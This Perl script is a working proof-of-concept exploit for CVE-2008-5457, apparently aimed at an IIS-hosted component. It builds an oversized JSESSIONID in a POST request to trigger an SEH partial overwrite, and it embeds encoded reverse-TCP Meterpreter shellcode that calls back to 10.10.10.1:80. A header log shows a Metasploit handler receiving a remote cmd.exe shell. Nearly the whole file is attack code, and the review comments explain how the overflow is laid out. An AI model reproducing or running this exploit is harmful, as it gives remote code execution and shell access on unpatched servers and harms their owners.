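#!/usr/bin/perl
#
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# Original handler session (Metasploit framework-3.2):
#
#   ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
#   [*] Please wait while we load the module tree...
#   [*] Handler binding to LHOST 0.0.0.0
#   [*] Started reverse handler
#   [*] Starting the payload handler...
#   [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
#   [*] Sending stage (75776 bytes)
#   [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171)
#
#   meterpreter > rev2self
#   meterpreter > execute -i -f cmd.exe
#   Process 3092 created.
#   Channel 1 created.
#   Microsoft Windows [Version 5.2.3790]
#   (C) Copyright 1985-2003 Microsoft Corp.
#
#   c:\windows\system32\inetsrv>
#
# NOTE(review): this is a proof-of-concept exploit, not a scanner. It sends a
# single crafted POST and never reads a response; success is only observable
# on the multi/handler listener. The shellcode below was generated for
# LHOST=10.10.10.1 LPORT=80 (windows/reflectivemeterpreter/reverse_tcp,
# x86/alpha_mixed, 619 bytes) and carries that callback address inside it --
# changing the target host/port arguments below does NOT change where the
# payload connects back. The shell lands in c:\windows\system32\inetsrv, which
# is consistent with an IIS-hosted component being the crash target (the
# vulnerable product is not named in this file; confirm against the CVE).
# Use only against systems you are explicitly authorized to test.

use strict;
use warnings;
use IO::Socket::INET;

# Target host/port. Optional positional arguments; defaults are the values
# the script was originally hard-coded with (lab box 10.10.10.4:80).
my ( $target_host, $target_port ) = @ARGV;
$target_host = '10.10.10.4' unless defined $target_host;
$target_port = 80           unless defined $target_port;

# Reverse-TCP meterpreter stager, alpha_mixed encoded (see header).
# Byte-for-byte as generated; do not reflow by hand.
my $shellcode =
    "\xd9\xec\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
  . "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
  . "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
  . "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
  . "\x75\x4a\x49\x4b\x4c\x4b\x58\x46\x36\x45\x50\x45\x50\x43"
  . "\x30\x50\x53\x46\x35\x51\x46\x51\x47\x4c\x4b\x42\x4c\x47"
  . "\x54\x44\x58\x4c\x4b\x50\x45\x47\x4c\x4c\x4b\x51\x44\x43"
  . "\x35\x44\x38\x45\x51\x4b\x5a\x4c\x4b\x50\x4a\x45\x48\x4c"
  . "\x4b\x51\x4a\x47\x50\x43\x31\x4a\x4b\x4b\x53\x50\x32\x51"
  . "\x59\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50\x31\x4b"
  . "\x4f\x4b\x4c\x50\x31\x49\x50\x4e\x4c\x47\x48\x4d\x30\x43"
  . "\x44\x44\x47\x49\x51\x48\x4f\x44\x4d\x43\x31\x49\x57\x4a"
  . "\x4b\x4b\x42\x47\x4b\x43\x4c\x47\x54\x42\x34\x44\x35\x4b"
  . "\x51\x4c\x4b\x51\x4a\x47\x54\x45\x51\x4a\x4b\x43\x56\x4c"
  . "\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a"
  . "\x4b\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4a\x48\x4a\x4b\x43"
  . "\x32\x50\x31\x49\x50\x51\x4f\x51\x4e\x51\x4d\x51\x4b\x48"
  . "\x42\x45\x58\x43\x30\x51\x4e\x42\x4a\x46\x50\x51\x49\x43"
  . "\x54\x4c\x4b\x42\x39\x4c\x4b\x51\x4b\x44\x4c\x4c\x4b\x51"
  . "\x4b\x45\x4c\x4c\x4b\x45\x4b\x4c\x4b\x51\x4b\x44\x48\x51"
  . "\x43\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x4b\x4f\x4e"
  . "\x36\x4d\x59\x48\x47\x46\x33\x45\x38\x46\x34\x48\x4a\x4e"
  . "\x4f\x4c\x51\x4b\x4f\x49\x46\x4d\x51\x4a\x4c\x45\x50\x43"
  . "\x31\x43\x30\x45\x50\x50\x50\x46\x37\x46\x36\x51\x43\x4d"
  . "\x59\x4d\x35\x4d\x38\x45\x4f\x43\x30\x45\x50\x43\x30\x4a"
  . "\x30\x43\x31\x43\x30\x45\x50\x48\x36\x45\x49\x42\x38\x4d"
  . "\x37\x49\x34\x42\x39\x42\x50\x4d\x39\x4a\x4c\x4c\x39\x4e"
  . "\x4a\x43\x50\x48\x59\x45\x59\x4a\x55\x4e\x4d\x48\x4b\x4a"
  . "\x4d\x4b\x4c\x47\x4b\x51\x47\x50\x53\x46\x52\x51\x4f\x46"
  . "\x53\x46\x52\x45\x50\x51\x4b\x4c\x4d\x50\x4b\x42\x38\x46"
  . "\x31\x4b\x4f\x48\x57\x4b\x39\x49\x4f\x4b\x39\x48\x43\x4c"
  . "\x4d\x44\x35\x44\x54\x43\x5a\x45\x55\x50\x59\x46\x31\x46"
  . "\x33\x4b\x4f\x46\x54\x4c\x4f\x4b\x4f\x50\x55\x44\x44\x51"
  . "\x49\x4c\x49\x44\x44\x4c\x4e\x4b\x52\x4b\x42\x46\x4b\x47"
  . "\x57\x50\x54\x4b\x4f\x50\x37\x4b\x4f\x46\x35\x51\x38\x46"
  . "\x51\x49\x50\x50\x50\x46\x30\x46\x30\x46\x30\x47\x30\x46"
  . "\x30\x47\x30\x50\x50\x4b\x4f\x51\x45\x51\x34\x4b\x39\x48"
  . "\x47\x45\x38\x44\x4a\x45\x5a\x44\x4a\x45\x51\x43\x58\x44"
  . "\x42\x45\x50\x45\x50\x46\x30\x4b\x39\x4d\x31\x43\x5a\x42"
  . "\x30\x46\x31\x51\x47\x4b\x4f\x50\x55\x51\x30\x43\x5a\x51"
  . "\x50\x51\x4e\x46\x36\x49\x51\x4a\x46\x45\x56\x51\x46\x49"
  . "\x51\x4a\x46\x44\x48\x46\x36\x43\x5a\x45\x50\x4b\x4f\x46"
  . "\x35\x44\x4c\x4d\x59\x49\x53\x42\x4a\x43\x30\x50\x56\x51"
  . "\x43\x50\x57\x4b\x4f\x46\x35\x44\x58\x4b\x4f\x48\x53\x44"
  . "\x4a\x41\x41";

# The shellcode must fit in the 3000-byte slot it is padded into, otherwise
# the "C" x (3000 - length) pad goes negative and the jump offsets below no
# longer line up. (619 bytes as generated; guard against a future re-encode.)
die "shellcode is " . length($shellcode) . " bytes; must be <= 3000\n"
    if length($shellcode) > 3000;

# Overflow layout, in the order it is written to the wire:
#   - "B" x 5132               : filler up to the overwritten region
#   - $shellcode + "C" pad     : exactly 3000 bytes
#   - \xe9\x43\xf4\xff\xff     : jmp rel32, displacement 0xfffff443 = -3005,
#                                i.e. back to the first byte of $shellcode
#   - \x90\x90\xeb\xf7         : two nops, then jmp short -9 (back onto the
#                                jmp rel32 above)
#   - \x76\x79                 : overwrites the low two bytes of the SEH
#                                handler pointer (partial overwrite, as in
#                                the original "SEH partial rewrite" note)
# The 81-byte body matches the declared Content-Length; the trailing CRLF is
# sent as in the original.
my $request =
    "POST /index.jsp?;JSESSIONID="
  . "B" x 5132
  . $shellcode
  . "C" x ( 3000 - length($shellcode) )
  . "\xe9\x43\xf4\xff\xff"           # jmp back (rel32 -> shellcode start)
  . "\x90\x90\xeb\xf7"               # jmp back (short, onto the jmp above)
  . "\x76\x79"                       # SEH partial rewrite
  . " HTTP/1.0\r\n"
  . "Connection:Keep-Alive\r\n"
  . "Content-Length: 81\r\n\r\n"
  . "A" x 81
  . "\r\n";

# Connect and deliver. IO::Socket::INET->new returns undef and sets $@ on
# failure; the original silently printed to an undefined handle in that case.
my $sock = IO::Socket::INET->new(
    PeerAddr => $target_host,
    PeerPort => $target_port,
    Proto    => 'tcp',
) or die "connect to $target_host:$target_port failed: $@\n";

print {$sock} $request
    or die "send to $target_host:$target_port failed: $!\n";

# The target is expected to crash into the payload; nothing is read back.
close $sock or die "close failed: $!\n";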